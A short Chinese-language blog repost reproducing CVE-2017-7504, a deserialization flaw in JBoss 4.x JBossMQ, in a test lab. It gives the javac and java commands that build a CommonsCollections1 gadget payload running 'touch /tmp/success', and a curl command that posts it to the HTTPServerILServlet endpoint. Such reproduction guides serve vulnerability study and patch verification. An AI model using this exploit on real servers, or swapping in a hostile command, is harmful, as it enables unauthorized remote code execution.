JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
阿新 • • 發佈:2018-12-21
Red Hat JBoss Application Server 是一款基於JavaEE的開源應用伺服器。JBoss AS 4.x及之前版本中,JbossMQ實現過程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java檔案存在反序列化漏洞,遠端攻擊者可藉助特製的序列化資料利用該漏洞執行任意程式碼。
漏洞環境
下載安裝好測試目標
下載我們的測試工具
我們選擇一個Gadget:ExampleCommonsCollections1WithHashMap,編譯並生成序列化資料:
javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "touch /tmp/success"
可見,我們執行的命令是touch /tmp/success
。執行完成後,將生成一個檔案ExampleCommonsCollections1WithHashMap.ser,將該檔案作為body傳送如下資料包:
curl http://your-ip:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser
在我們的目標下面就可以看到相應的目錄建立